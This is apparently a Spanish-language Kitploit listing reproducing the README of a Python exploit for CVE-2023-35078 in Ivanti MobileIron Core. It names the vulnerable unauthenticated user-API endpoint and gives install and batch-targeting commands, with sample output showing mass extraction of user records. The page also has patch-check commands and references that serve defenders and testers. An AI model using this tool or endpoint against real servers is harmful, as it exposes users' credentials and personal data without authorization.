Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/0nsec/cve-2023-35078
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - Herramienta de explotación de acceso remoto no autenticado a la API de Ivanti MobileIron Core

Ver Repositorio
150hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Herramienta de Explotación CVE-2023-35078

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - Ivanti MobileIron Core: Acceso a API remoto no autenticado

Python Version License CVSS Last Updated

Un exploit de prueba de concepto basado en Python para CVE-2023-35078, que apunta a la vulnerabilidad de Acceso a API remoto no autenticado en sistemas Ivanti MobileIron Core.

Resumen de la vulnerabilidad

CVE-2023-35078 es una vulnerabilidad crítica que afecta a Ivanti MobileIron Core y permite a atacantes remotos no autenticados acceder a endpoints de API sensibles y extraer datos de usuario sin ninguna autenticación.

  • Puntuación CVSS: 9.8 (Crítico)
  • CWE: CWE-306 (Autenticación faltante para función crítica)
  • Productos afectados: Ivanti MobileIron Core
  • Versiones vulnerables:
    • 11.2 (anteriores a 11.2 CU21)
    • 11.3 (anteriores a 11.3 CU18)
    • 11.4 (anteriores a 11.4 CU8)
  • Vector de ataque: Red
  • Autenticación: No requerida
  • Interacción del usuario: No requerida
  • Impacto: Exposición completa de datos de usuario

Detalles técnicos

La vulnerabilidad existe en el mecanismo de autenticación de API de MobileIron Core, específicamente en el endpoint /mifs/aad/api/v2/authorized/users. El endpoint no valida correctamente los tokens de autenticación, permitiendo el acceso no autorizado a información sensible del usuario, incluyendo:

  • Credenciales de usuario: Nombres de usuario, hashes de contraseñas
  • Datos personales: Nombres completos, direcciones de correo electrónico, números de teléfono
  • Datos corporativos: IDs de empleado, información de departamento
  • Información del dispositivo: Dispositivos inscritos, configuraciones de dispositivo
  • Datos administrativos: Roles de usuario, permisos, membresías de grupo

Instalación

Requisitos previos

  • Python: 3.6 o superior
  • Sistema operativo: Linux, macOS, Windows
  • Acceso de red: Requerido para pruebas en objetivo
  • Permisos: Autorización de los propietarios del sistema

Instalación rápida

root@kitploit:~
# Clonar el repositorio
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# Instalar dependencias
pip3 install -r requirements.txt

# Hacer ejecutable (Linux/macOS)
chmod +x cve_2023_35078.py

Instalación manual

root@kitploit:~
# Crear el directorio del proyecto
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# Descargar el script
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# Instalar paquetes requeridos
pip3 install requests urllib3 termcolor argparse

Instalación con Docker (Opcional)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# Construir y ejecutar con Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

Uso

Uso básico

root@kitploit:~
# Probar un solo objetivo
python3 cve_2023_35078.py -u https://mobileiron.example.com

# Probar múltiples objetivos desde un archivo
python3 cve_2023_35078.py -f targets.txt

# Modo verboso con directorio de salida personalizado
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# Tiempo de espera y configuración de salida personalizados
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

Ejemplos de uso avanzado

root@kitploit:~
# Evaluación corporativa integral
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# Objetivo único con registro detallado
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# Escaneo por lotes con tiempo de espera personalizado
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# Verificación rápida de vulnerabilidad (sin salida verbosa)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

Salida

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] Objetivo: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] Verificando versión para: https://vulnerable.mobileiron.com
[*] Versión detectada: 11.3
[+] ¡El objetivo parece VULNERABLE!
[*] Intentando explotar: https://vulnerable.mobileiron.com
[*] Probando endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] ¡ÉXITO! Se encontraron 1,247 usuarios
[+] Resultados guardados en: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] Se extrajeron 1247 registros de usuario
[*] Campos de muestra: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] ¡Escaneo completado!
[*] Objetivos procesados: 1
[*] Explotaciones exitosas: 1
[!] ADVERTENCIA: ¡Se encontraron 1 sistema(s) vulnerable(s)!
[!] ¡Asegure la autorización adecuada antes de realizar pruebas!

Salida verbosa

root@kitploit:~
[*] Verificando versión para: https://test.mobileiron.com
[*] Probando endpoint: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - Longitud de respuesta: 45,123 bytes
[*] Análisis JSON exitoso
[*] Se encontró estructura de datos de usuario con 234 registros
[+] ¡ÉXITO! Se encontraron 234 usuarios
[*] Datos de usuario de muestra: {'id': '12345', 'username': '[email protected]'}
[+] Resultados guardados en: ./results/test_mobileiron_com_20250821_055013.json

Optimizaciones de rendimiento

  • Pooling de conexiones: Reutiliza conexiones HTTP
  • Solicitudes concurrentes: Procesamiento paralelo para múltiples objetivos
  • Tiempos de espera inteligentes: Tiempo de espera adaptativo basado en tiempos de respuesta
  • Gestión de memoria: Manejo eficiente de grandes conjuntos de datos
  • Limitación de tasa: Retrasos incorporados para evitar abrumar a los objetivos

Información del parche del proveedor

Verificación del parche

root@kitploit:~
# Verificar la versión actual
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# Verificar que los endpoints parcheados devuelvan 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

Referencias y recursos

Avisos de seguridad oficiales

  • NVD - CVE-2023-35078
  • Aviso de seguridad de Ivanti
  • Catálogo de vulnerabilidades explotadas conocidas de CISA

Documentación técnica

  • Guía de administración de Ivanti MobileIron Core
  • Documentación de API
  • Guía de endurecimiento de seguridad

Artículos de investigación y análisis

  • Análisis técnico detallado
  • Técnicas de explotación
  • Informe de inteligencia de amenazas
Descargar herramienta
VersiónVulnerableParche disponibleNivel de parcheFecha de lanzamiento
11.2.xSíDisponibleCU21+2023-07-25
11.3.xSíDisponibleCU18+2023-07-25
11.4.xSíDisponibleCU8+2023-07-25
11.5.x+NoN/DN/DN/D